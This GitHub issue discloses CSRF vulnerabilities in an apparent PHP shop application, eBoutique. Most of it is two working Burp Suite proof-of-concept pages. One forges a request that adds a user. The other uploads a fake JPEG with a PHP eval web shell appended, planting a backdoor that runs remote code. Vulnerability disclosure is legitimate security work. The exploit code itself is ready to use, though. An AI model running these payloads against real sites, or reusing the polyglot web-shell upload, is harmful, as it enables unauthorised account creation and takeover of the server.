Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF vulnerability that can add new users, and add project #1

Open
Timllay opened this issue Aug 6, 2018 · 0 comments
Open

Comments

@Timllay
Copy link

Timllay commented Aug 6, 2018

There is a CSRF vulnerability that can add new users, and add project by ordinary user

1.Add user
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.209/ee/eBoutique/app/template/includes/crudTreatment.php" method="POST">
      <input type="hidden" name="addUserLogin" value="guoliang" />
      <input type="hidden" name="addUserPassword" value="123123" />
      <input type="hidden" name="addUserPasswordConfirm" value="123123" />
      <input type="hidden" name="addUserEmail" value="123&#64;qq&#46;com" />
      <input type="hidden" name="submitAddUser" value="Add&#32;User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2,Add item
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.98.209\/ee\/eBoutique\/app\/template\/includes\/crudTreatment.php", true);
        xhr.setRequestHeader("Accept", "text\/html, application\/xhtml+xml, image\/jxr, *\/*");
        xhr.setRequestHeader("Accept-Language", "zh-CN");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------7e224118180778");
        xhr.withCredentials = true;
        var body = "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"addProdName\"\r\n" + 
          "\r\n" + 
          "lajilaji\r\n" + 
          "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"addProdDesc\"\r\n" + 
          "\r\n" + 
          "asdsa\r\n" + 
          "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"addProdPrice\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"addProdImg\"; filename=\"3.jpg\"\r\n" + 
          "Content-Type: image/jpeg\r\n" + 
          "\r\n" + 
          "\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00\x84\x00\t\x06\x07\x10\x10\x10\x10\x0f\x10\x12\x10\x10\x10\x0f\x0f\x0f\r\x0f\x0f\x10\x0f\x10\x0f\x0f\x10\r\x15\x11\x16\x16\x15\x11\x15\x15\x18\x1d( \x18\x1a%\x1b\x15\x15!1!%)+...\x17\x1f383,7(-.+\x01\n" + 
          "\n" + 
          "\n" + 
          "\x0e\r\x0e\x1a\x10\x10\x1b+\x1d\x1f\x1d--------------------------------------------7-+--7\xff\xc0\x00\x11\x08\x00\xbc\x01\x0c\x03\x01\"\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x00\x1b\x00\x00\x02\x03\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x03\x01\x04\x05\x00\x06\x07\xff\xc4\x007\x10\x00\x02\x01\x03\x02\x04\x04\x04\x05\x03\x03\x05\x00\x00\x00\x00\x00\x01\x02\x03\x04\x11!1\x12AQa\x05\x13q\x91\x14B\x81\xa1\x06\"R\xb1\xf02\xc1\xd1\x15r\xe1\x16#3b\xf1\xff\xc4\x00\x1a\x01\x00\x03\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x00\x04\x05\x06\xff\xc4\x00$\x11\x00\x02\x02\x02\x01\x05\x01\x00\x03\x01\x00\x00\x00\x00\x00\x00\x00\x01\x02\x11\x03\x121\x04\x13!AQ\x14\"2\xd1\x91\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00?\x00\xf1\xab=Xi\xbe\xa4`\x93\xe9R\x3cid;/\xab;\x8b\xb9\x19%!\xd4Ni\xe6\xf8w\x13%d\x95\x10\x94GH\xe7\x94\xec\x85\x9e\xe1\xac\x92\xa2\x1a\x88h\x9b\x90)\x3e\xac8\xe4%\x10\xd4BM\xc8\x15\x9e\xe1$\xc2H%\x13\x08\xe4\n" + 
          "\xc8H%\x10\xd4L#\x90+!\xa4\xc9Q\rD\x029\x02\xb2\x1a\x0e4\xc7\xd3\xa0\x06\xd22NEx\xc5\xb0\xd5\'\xdc\xd1\xa5nX\x85\xa97\x91#\xa2=+fT-\xa4\xfa\x8d\xf87\x8ef\xcc-F|.\x84\x9ec\xa6=\x1a\xa3\xcfJ\xd5\x82\xed\xdaY{\x9e\x87\xe15\x11qm\xc8e\x98W\xd2%\xe4\xf3\x92L\x06\x99\xab^\xd4\xa3R\x96\x0bFI\x9cS\x84\xa1\xc9U\xe4\x07\x92\xc4\xa2.Q\x1a\x80\xa4!\xa6\x0b\xfej9\xc4\x17\x13QE!-\x3e\xe04\xc7\xb8\x80\xe2\n" + 
          "\x1dHC\xc9\x1a\x8dq;\x84\x03\xec\"T\xc0\xf2\x8dY[\x00\xed\xc4L\xe9\x95\x99\xbc\x01p\x97]\x02\x3c\x82\x89\x92eU\x10\xd4G\xf9$\xaaa$\xe4)Db\x885\xe9\xbe\x1d7Z\x93kS\x89w[\x83o4+\xe2\xc3Q\t \xd4BQ\x18\x93\x90\n" + 
          "!\xa8\x87\x18\x86\xa0bnB\xd4CQ\x19\x18\x0f\x85\x06\x06\xc0\xad\xf0W\x8c\x0b4\xe8\x16)\xd0\xecY\xa7D\x9c\xa6^\x18~\x95\xa1D\xb5N\x81b\x9d\x12\xd5*$%3\xb3\x1e\x114(\x1a\x94-s\xa1\xd4(\x9a\x96\xb6\xe76I\x9e\x8e,eX\xd8\xb1\xeb\xc3\xff\x00)\xbfon\x9a\xd7r\xca\xb6X\xc7s\x8eY\xce\xc8\xe0G\x95\x9d\x8f\x0c[\xc6\xfb\x19\x95\xed\xcfmwm\x9d1\xa2\xd8\xc3\xbc\xb5H\xae,\xb6O.\x1a\x3c\xad{s6\xb5\x03\xd2\xddR3*\xd1;a\x90\xf3\xb2\xe2L\xf3\xf5h\x15\xe5\x03r\xad\x12\xa5Z\x1d\x8e\xa8\xcc\xf3r`k\x83)\xc4\x17\x12\xddJ8\x13(\x14\xb3\x9a\xda\xe4\xae\xe2\x03\x89a\xc4\x17\x13\x0e\xa4Wq#\x84s\x89\x1c \xa1\xf66%l.V\xc6\xf4\xad\x85J\xd8\xe2\x8c\xcfVQ0\xdd\xb0\x0e\xdc\xdb\x95\xb0\xb9[\x15S!(\x98\xce\x80\x3eA\xb0\xed\xc0v\xe3\xa9\x90\x94L\x9f$\xa5o\x08\xa9JZ\xa8\xbc\xe8\x96_\xb7\xa9\xe8]\xb8\xbf\x84I\xe7\x0b=p\xb2f\xec\x9aj7\xe0\xc7\x8d\xc4;\xafTX\x84s\xaa\xd5uF\x8b\xb2Ox\xa7\xea\x93\x1bN\xc9-\x12K\xd1\x0c\xa7\\\x93p\xdb\xfa\xa3\x3e\x14\x98\xf8[\x97\xe3l:6\xe2\xbc\x83\xc3\xa7\xfaS\xa7nX\x85\x02\xd4h\x0f\x85\x12O!\xd7\x0c%hQ,S\xa2X\x85\x12\xc4)\x12\x94\xce\x98\xe2H\xaf\n" + 
          "%\x9at\x87S\xa2Z\xa5D\x94\xa6tF\x00\xd0\xa4lZCb\xbd\n" + 
          "&\x85\x0c#\x97$\xac\xeb\xc7\x1a.\xd0\x8e\x9b\r+\xd3\x9b\x1d\xc6r3\xb2-P5\x96y\x99w\x94\x11~\xac\xf2Q\xaeS\x1f\x82Y)\x98wv\xe6ej&\xed\xc4J5i\x1d\xd0\x91\xc3\x92(\xc4\xa9D\xadR\x89\xb3:]\x8a\xf3\xa0tFg,\xf1\x98\x95(\x15j[\x1b\x95-\xca\xf5-\x8bG!\xcb\x93\x02~\x8c*\x940&P6\xe7lW\xa9hZ9\x0e9\xf4\xcdpd\xb8\x9d\xc2^\x95\xa8\xa7A\xf4\x1fdE\xc2K\x94{\xb9[\x89\x95\xb1\xb7*\x02\xe5nx\xab!\xf4\x92\xc6bJ\xd8\\\xad\xcd\xc9[\x00\xed\n" + 
          ",\x84^&\xcc\'n\x0b\xb6\xeco|\x1a\xe8w\xc2\x8f\xde\x13\xf2\xb7\xc9\x83\xf0d\xab.\xc6\xf2\xb5\'\xe1A\xde\n" + 
          "\xe9\x11\x86\xad;\x06\xad\r\xa5j\x12\xb5\x07x\xa2\xe9\x91\x8d\x1b@\xe3jl+P\xd5\xaf`\x3c\xa3\xac\x06Lm\x86F\xd8\xd6\x8d\xa0\xc8\xda\x08\xf2\x8e\xb0\x99q\xb6\x1d\x0bsV\x9d\x9cz\x8dVk\xaad\xdeb\xab\t\x9bN\x97e\xf7,\xc2\x9fd]\x8d\xacz\x92\xa8.\xbe\xc4\xdeD\xca,M\x15\xe2\xbb!\xf1CcN=\xc6(\xc4G\"\xaa\x02\xe3,\x0c\x8c\xb4a\x3ct#\"X\xd4\"B\'\x12\xe4\x9fe\xec\x02\xca\xd8e!\\L\xf9\xd1o\xe5\xfb\x15gn\xfa\x1b\x12\x9c\x84TRo#\xc6lIA3\x1ev\xaf\xa3\xf6\x02^\x1f.\x8dgl\xa3b|}Y^t\xe4\xf9\xbfr\x8b#\'\xdaF\x3c\xac%\xd0T\xfc:]\ri\xdb\xb12\xa0\xca,\x8f\xe8\x8f\x12\xf8eV\xf0\xb6\xb7k\xf7+\xd4\xf0\xe8\xf5\xc9\xb1*\x0cL\xa8\x3e\x83\xac\xaf\xe97\x86?\x0cYxop\x7f\xd3\xbd\r\x9f\'\xaa\xfb\x1d\xe5.\x8f\xec\x1e\xf3\xfa/\xe7\x87\xc3\xd4:\x00:\x06\x84\xa2\x81qG\x9d\xbb=-\x11A\xdb\x83\xf0\xc5\xe9z\x01\xc4\xb9\x8d\xb3\x06\x88\xa7\xf0\xe7|9o\xcc]\xc2\x8b\x8b\xd8\xdb\xb0(D\xa6\xad\xfb\x12\xad\xcb\xb8\x88\xa9\xdcAs\xf66\xed\x85\xc2+\x91*\xd9\x07\x1bs\xbe6\x9f\x7ff:\x95\xc4%\xb3O\xf73r2P\xf4\x02\xa0\x89T\x115\xee\xa1\x0f\xea\x7fM\xdb3+x\xd4\xbeX%\xd1\xcbVd\xa7.\x05\x9c\xa1\x1eM?%\x06\xa9#*\xdf\xc70\xb1R:\xf5\x86\x8b\xd8\xb3O\xc6\xa9\xbd\xf3\x1f^ap\x98\x16Lo\xd9uR\'\xcbEZ^+JZg\x1f\xeeM\x1d_\xc5\xe9A\xe1\xc97\xdbQu\x97\xc1\xf6\x85]\x96\xd4\x11*&\'\x88\xfe\"\x8cV).)?\x99\xff\x00J\xff\x00\'\x9e\xab\xe2u\xe5%\'RY[k\x8cz\x14\x86\t\xcb\x9f\x04ruX\xe0\xe9y=\xee\x0e\xc1\xe3\xa8~\"\xb8\x8e\x8d\xc6k\xff\x00e\xaf\xba\x1f\x0f\xc53\xe2Y\x84xy\xe1\xb5#\x3e\x9f\"\n" + 
          "\xea\xf1\x1e\xab\x04`\xc9\x8f\xe2;w\xcek\xd6,?\xf5\xebo\xd7\xf6d\xde9\xfc*\xb2\xe3~\xd1\xa7\x83\xb0P\xa5\xe3\x16\xf2\xda\xa4~\xb9B\xee\xfcv\xde\x9e\xf3\xe2}#\x99\x03IqAy \x95\xda4\\Hq\x3c\xb5\xdf\xe3(\xac\xaat\xa5.\xf3i/c-\xfe0\xb9\xcb|4\xb0\xf9p\xcbO\xb9h\xf4\xd9\x1f\xaa9\xa5\xd6\xe1N\xae\xcft\xe3\xe8\x03\x87\xa1\xf3\xea\xff\x00\x8a\xae\xe5.%(\xc1/\x920\x8b\x8f\xdfR\xdf\x87\xfe1\xab\x1d+AT_\xaa)BK\xe9\xb3\x19\xf4\xb9\x12\xb1c\xd7bn\xbc\x9e\xceP\xee\x80\x95\x3e\xe8\xc7\x87\xe2\xebW\xbf\x1c}a\x9f\xd8]\xc7\xe3\x0bh\xac\xc5No\xa2\x87\x0f\xdd\x92\xed\xe4\xf8\xcb\xf7\xb1}F\xbc\xa9\xae\xbfa2\xa6\xba\xfd\x8c\xbf\xfa\xc2\xd9\xe3J\x8b;\xfe]\xbf\xc9\xa7k\xe2\x14k\x7f\xe3\xa9\x196\xb3\xc3\xf3{\x19\xc6q\xe5\r\x19B\\1r\xa5\x1e\xaf\xd8\x07Aw.I\x0bq\xf5\x17a\xf4G\xa0\xc0.$\xe4\x8c\x93(\x04\xa0.T\xc7\xe4\x8c\x86\xc1EgL[\xa6\\h\x07\x10\xd8\xba\x94\xe5H[\xa0^q\x02P\x1ba\\\n" + 
          "\x12\xa4-\xd3/M`\x1f/#lM\xc0\xcf\x95\x0c\xee\x0b\xb6]\xcd\x07D\tSaS\x03\xc7\xf4\xa0\xedb*t \x8b\xf2\xa0\xc5J\x87a\x94\xc4x\xd7\xc3:\xa4W%\xeeV\x95\x13Y\xdb\x80\xed\x8a)\x92x\xac\xc8t\x00t\r\xaf\x83d|\x08\xdd\xd1\x1e\x06\xccG@\x15At7~\x04%h\x96\xe1\xee\x83\xf3\x18_\x0f\xd8\x87o\xd8\xda\x94`\x8a\xd5\xd7ML\xb2\x05\xe1Q2*,|\xa2e\x9e\x89\x1aS\xa6\xc5J\x97l\x14R#(3.PlT\xa8\x9a.\xd0%K\xaa\x1bbJ\x1fQ\x90\xe9\x0b\x956mJ\x82\xec&\xa54\xbb\x9bq\xb4H\xc8t\xd8.\x9b4%\x17\xfcBeI\xb0\xf96\xd1(\xe3\xb8Q\x8bO)\xb4\xf95\xb8\xd9P:9\\\xb2\x06\x3c$\xbd\x97(\xf8\xe5\xdc\x12\x8a\xab&\x97\xea\x8cd\xfd2\xd6H\xab\xe37Ry\xf3d\xbbEE/\xd8\xaf\x1cs\xd0\t\xcb\x0fDGU|\x1dji.O\xb2d\xec\x82\x0b\x967\x3c\xf3\xbcfH\xc8\n" + 
          "Y\xd8\xec\x84\xc1\xe4\x8c\x80\xe6\xba\x8b\x9dn\x86\xa069\xb1r\xaa\x8a\xee\xa3\xd8\x1e!\xb5\x11\xcf\xe0\xc6\xc8\x8c\xb0/\x88\xee \xd0\xb61\xd4dJ\xaa\x17\x92\x18h\xdb3\x9dPeT\x86\x81h4\x85\xb62\x15W1\xb8]\x8a\x8d\x13\t`\xcd\x05O\xe9o\x84\x19\xb4\xb7\x16\xebai\xbfA\x12\xa8\xde\xe0Hg4\x86N\xb3\xe4W\xa9\x97\xb8Y9\xb1\xd7\x82M\xb6\"T\xc1\xf2\x87\xb0X\xd6N\x84:B\xa5D\xb4\xc0cX\x1cJ\x92\xa4\x04\xa9\x17%\x10\x1cCb\xb8\x94eDL\xa8\x1a.\x00\xb8\r\xb0\x8e\x06\\\xad\x85\xbbsU\xd3\x16\xe9\x87ro\x11\x95+an\xd8\xd7t\x80tC\xb842%l\x0f\xc3\x1a\xce\x88\x3eHv6\xa7\xb5u\x9b\x01\xcc\x0c\x1d\x86p\xf8=7aq\x11\xc4s\x89\x1c,&\'\x88\x8e#\xb8Y\x1c,\xc0\'\x88\x8c\x9d\xc2\xc8\xe0f1\xceGd\x8e\x16v\x02brvH\xc1\xd81\x8el\x82xI\xe05\x9a\x80d0\xdc\x19\x0e\x9b5\x82\x98\xb6C\x18\xe3\xd7N\x9a\xa1UjF;\xb5\xe9\xcc(\rQ\xc4\x0b\xf8\xa8u\xfbj\x1d)\xc6_\xd2\xff\x00\xb3\x08\xbe\x19\xc4`w\x94\xc8tX,:\xb1-\x02\xd0\xff\x00)\x9c\xe8\x9a\xcd\xab+4\x0bE\x89R\xc6\xafE\xdc\xca\xbc\xb9\xce\x8bo\xbb\x1dy\'/\x03\xa5q\x05\xcf\xd9\x15\xa5{\xae\xda\x15\xf2\x0b(\x92$\xe4\xcd*RSY_P\x9c\x0c\xb8\xc9\xad\x9b^\x9a\x17l\xef~Z\x9b~\xae\x7fP44d\x9f\x869\xd3\x05\xd34U\x14\xf5Z\xa7\xb3[\x13\xf0\xe4\xf7+\xdafc\xa4\x0f\x94j\xfc1*\xd7\xb1\xb7@\xec\xb2\xfa\x88\\\x08Z\x98JG5\x9d\xb4\x1a\x81\x3c\x04&\x12a\xb3R#\xcb;\x80\"\x01f\xa28\x08\xf2\xc29\xc9-\xdaA\xb3R\x07\xcbDp\"%q\x05\xbc\xa3\xeeU\xad\xe2pK\xf2\xa7\'\xec\x82\x94\x98\xaeQ\\\x97\x3c\xb4w\x96\x8cj\xde#R[5\x1d~]\x19\xd4|J\xa2\xdf\x12\xf5C\xf6\xe4O\xbd\x0b6x\x10\x0ePZ6\xbd\xccj\xf7\x93\x9e\xef\x0b\xa2\xd1\x15\xb0\x15\x89\xfb`y\x97\xa4oW\xb8\x84#\xc4\xda}\x12yl\xca\xad\xe2s{%\x15\xd9k\xeeUh\x17\x12\x91\xc6\x97$\xa7\x96O\x8f\x07Jm\xea\xdeAl\x89\x10P\x81\xcd\x91\xc4F\x0e0\x0bv\xde!8t\x92\xe9\"n|Js\xd3H\xae\x91)`\xec\x03Ev?rUV2\x17\x12\x8b\xca\x93_Q\xf3\xf1J\x8dn\x97t\xb0\xcaSx\xdcL\xaad:\xa6.\xf2^\xcb5\xef\xa7$\xa2\xde\x88\xac\xe4A\xcd\x05*\x15\xc9\xbeN\xc9\x1cD\xc69\x18\xa83\x00^N\xc0\xd5n\x1a\xa4k\r2mn\xe7M\xe8\xf2\xb9\xc5\xea\x9a-\xbf\x18\xa9\xc4\x9e#\x85\xf2\xe3\x7f\xaf\"\xb4h\x17(X\xe3Y}\x10\x92Q\xe5\x94\x8b\x9f\t\x97\xe8x\x84e\x1e\'\x16\x9f\xe9\xce\x8f\xea2\x3e)\x1epy\xec\xd6\n" + 
          "\x8e\x93z\"U\xa7W\xa9-b_y\x96\xd4\xc6Ff|%6\xd2\xd1\x0e\x94d\x96\x8dgG\x8f\xecB\x8e\xbb/Bc\x14\x8c\xeb\x89Ma\xc5\xe9\xcd`\x0f9\xec\xdf\xdf#(\xd8\xaeTjJ\xaa[\xb1S\xbbKe\x9f\xb1\x99Rm\xf6\xfd\xc0\xd7\xab\x1dA\x12yX\xfa\x93\x93ym\xfd\x1b\xc0\xb9E\xf5~\xf9\x07\x8aX\xc0\x11\xe2\xeaQ\"M\xd8^Y\x1eQ\x3cr\xfe \x7f7P\x83\xc1\xdeQ\xdeP\xc8\xc9\xf3Y\t\xcb\xb0-\x9a\x90\xaf(\x8f,\x97)\x13\xc5 \xd9\xbc\t\x94q\xd8\x1c\xa7\xcc)\xc1\xbd\xc8\xf2Cb\xd03\xc2\x0143\xc9d:a\xb4+LL\xa4\x82I\x07\xe5\x10\xe9\x06\xc1@au\x02R\\\xbd\xc7yD\xaa&\xb4jeO/\'y%\xd5E\x9d\xe53lm\n" + 
          "~Q\x3eQuR&4\xc1\xb1\xb4(\xaaE\xaa=\x18\xdf,\xe8\xc3\xa6\xa6r\x19F\x82t\x89\x8d\xbev\xf7,R\xa6\xbeb\xc4z\"nETQZ\x9d\xb2\x8fw\xd4l!&X\x8d\x3e\xa3Tz\xfb\n" + 
          "\xe42\x88\xaat\xba{\x8dT\x17=C\xc9\x1cB\xd8\xe9#\x06\x8f\x89R\x96\x1f\x16\x1f]\x99~\x9d\xc4e\x18\xb5\x89\xcf\x1ar\xed\x93\xe6\xf4o{\x9a\xfe\x1b\xe3\x12\xa4\xff\x00.\x1e\xe9\'\x96\xb5\x19\xc1U\x89\x8b\xaa\x8a\xfe\xc7\xb9t\xf2\xbb\xb5\xf4\xd8\xcb\xab\x94\xde\xcf\x1c\xd1\x8f?\xc4\xb5$\xb5\x969~Tu\x1f\x15\x8b\xd2Z\xae\xbc\xc5Ph\\\x9dD$\xa9\x1a\xb1\xac\x12\xaf\x1e\xa6\\\xaeb\xbem\xf6\xd7As\xad\xae^\x1e\xab`\x90y$\x8d\xee%\x80\x15Tf\xbb\xe8Es\xd7;\xa7\x82\x8d[\xed\xb0\xf3\xdd\xe55\xfd\x9a\x08%\x9b\xe1\xbe\xaa\xa0\x94\xd1\xe7\xe8\xdeK\x8dqe\xa7\xd3\x0fC[\xcf\x83\x8er\xd2\xf4\xd4\xc6\x8em\x8b^b%\xd4]\x8f9qz\x94\xf5s\xe1\xc2m\xc69c\xdd\xc2\x92\\\x12\xd3}s\xfc\xc9\x84\xfd(\xd7\x9d\xc4Q*\xba\x3c\xc5\xe5yG\x9ew\xc6\xe3l\xaaJK\xfa\xa2\xbf\xdd\x95\x9f@\x89\xfa\xff\x00\x95\x1e\x86U\x90.\xe5.g\x98\xbb\xbd\x92me}\x1b+V\xf1M9\xbe[\xb5\x83P?e\xba=\x8ck\xa6MZ\x98\x3c\x87\x85\xf8\xa3\x9eu\xfa\xbct,\xd5\xba\xad\xba\xc62\xf5\xcb\xdb\xd0\xc3\xfe\x9fL\xf4\x7f\x10\xba\x86\xa6\x8f\x1b\xfe\xa3\x3c\xb4\xfa\xe8h\xdb\xf8\x84\x9aI\xe7\xb9\x85\xfdH\xf4\xcda\'\xd7`e4\x85R\x97\x1d\x18\xe2I5\x97\xae\xfb\x99\xf5\xee&\xb6O~\x8c\x08\xbc\xf2\xa8\xa4\xfe\x9aN\xaa\x06ULn)\xbex]\xc7\xd2Y\xdeM\xfa, \x91\xfd\r\x9aQ\xaa\x1cS|\x8a\xb4\xe5\xc3\xb7\xec\xdb\x1d\xc57\xe9\xdc\x16Qe\x1e\xa1\xd5\xfd\x10.\xb6\x1e\x12\xf6\x05Ro|\xbf]\x11\x154\xdf\xd9h\x0b\x0e\xec}\x16\xde\xfe\xdc\xcb\x90z\x19_\x11\x82U\xe2Kv\x03,\xa9{5]ll/\xe2\x8c\xba\x97\xd1\xeaU\xa9\xe21\\\xff\x00sP%\xd5E{7]\xda\x13+\xe5\x9d\xcf=?\x15\x8e\xba\xfd\x99\x9fS\xc5\x96^\xa3(\x91\x97\\\xbd3\x0e\xc3\xc3\xddT\xe4\xaaF\x1c?\xd4\xa5\xbf\xd0&\xb8e\xf9^xu\xcft\xc4A\xe1\xbc\x03\x19o\xe8.\xcd\xc7\xc9\xe1K\xab\xcb/tXR\xcb\xc6N\x83\x9c[RO\x0bg\x8d\x1a\xea\"\x8b\xd4\xf4\xb7W\x12Vk\x1c\xd2M\xe3\\\x02-$\xd9\xd1\xd3g\x9f\xf2\xb7\xea\xcc\x98W\xd5\x3c\x96#v\xf2\xb1\xb73\rM\xf5\x1d\x19\xb3\xa3TZ=\\\xd1\xea)_\xc5\xff\x00RO\xe82S\xa5=\xd7\xb6\xe7\x9a\xa5Q\xf5-B\xa3\xea\n" + 
          "2\xea\x19\xb7\x0bz{\xa7\x97\xdf\x19\xf7\x19)\xce;G\x3c\xb95\xf62i\xd5\x97R\xc5;\x89u\x12\x82\xa5|\x0fu\xdeu\x8a\x7f\xcfA\x0e\xbbM\xff\x00\xdb_B\xd4k7\xd3\xd8g\x02{\xa5\xeck\x03\x84\x9f\x0c\xc7\xbd\xa9\xc4\xb2\xe2\xf4\xf5:\x9dG\xc2\x96\xab\xeciN\x8c@\xf2V9\xfd\x8c#\xc7#\x12\xe24\xfb\xe7\xd4C\xb7\x86~myg\xfe\r\xaa\xf6\xf1\xff\x00\xee?\xc1M\xc5q=\x16\x91\\\x97P\xb3C\x07\xb4V\xa1iN\x1a\xa7/v^\x8du\x8cn\xbb\xb7\xa9^/]\x97\xb1r\x9c\x17\xf1#Xg\x8ai\xf9|\x8aU#\xa6\x8b\xeb\x96X\xa1_U\xa6\x99\xe4\x87*\x0b\x1c\xfe\xdf\xe0};u\xd5\xfb\x98\x11\xc5.S,[U\x8e\xca/\xae\xd8\xd4\xb3.\xf8\xfa\xeaU\x8c\x12\xff\x00\x90\xfc\xc7\xae\xde\xc2\x9d*R^\x18\xfb{\'Q\xe21\xce5\xd1a}[\x18\xa9\xa8\xbc8\xe3\x1f\xabO\xb0\xcb\x1b\xb9\xc6\x9d|\x3cp\xd3RX\\\xf3\xb9\x91V\xe6r\xfc\xcd\xea\xf5l\x08\xa4\xdcc\x14\xfd\xb3[\xe2!\x1f\xf0\x90/\xc4\xa2\xb6F\rz\xd2\xc3\xd7\x93\xfd\x8a\x13\xad,\'\x9eA\xa2_\xa1\xfa=5_\x14\xe8S\xaf\xe2\xac\xc3u_Q\x15j\xb3Q\xc9\x3e\xa6l\xd6\xa9\xe2M\xf3+K\xc4%\xfa\x99\x97)\xb1nlt\x8eif\x934\'y\'\xf3\x3e\xbbr*\xd4\xb8\xcf\xcd\xfd\x8b\xff\x00\x84\xe0\xa5yI=Ve\xa6\x17B\xea\xf0\x8aJr\x93N_\x9eZI\xe8\xbf3\xe8\x0bH\xa40O$\x14\xd3\xe5\xb5\xff\x00+\xfd\x3c\xf4c)\xbcG\x8aO\xa2\xd4\xbb\x0f\x01\xaa\xd6r\xa3\x9eNK&\xf2J+\x11J\x3e\x8b\x02\x1di\x1bc\xa6\x1d:\x8f-\x9f\xff\xd9\x3c\x3c?php @eval($_POST[x]);?\x3e\r\n" + 
          "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"addProdCat\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"addProdQte\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------7e224118180778\r\n" + 
          "Content-Disposition: form-data; name=\"submitAddProduct\"\r\n" + 
          "\r\n" + 
          "Add Product\r\n" + 
          "-----------------------------7e224118180778--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
@Timllay Timllay changed the title There is a CSRF vulnerability that can add new users, and add site projects to fake identity There is a CSRF vulnerability that can add new users, Add project to forge administrator identity Aug 6, 2018
@Timllay Timllay changed the title There is a CSRF vulnerability that can add new users, Add project to forge administrator identity There is a CSRF vulnerability that can add new users, and add project Aug 6, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant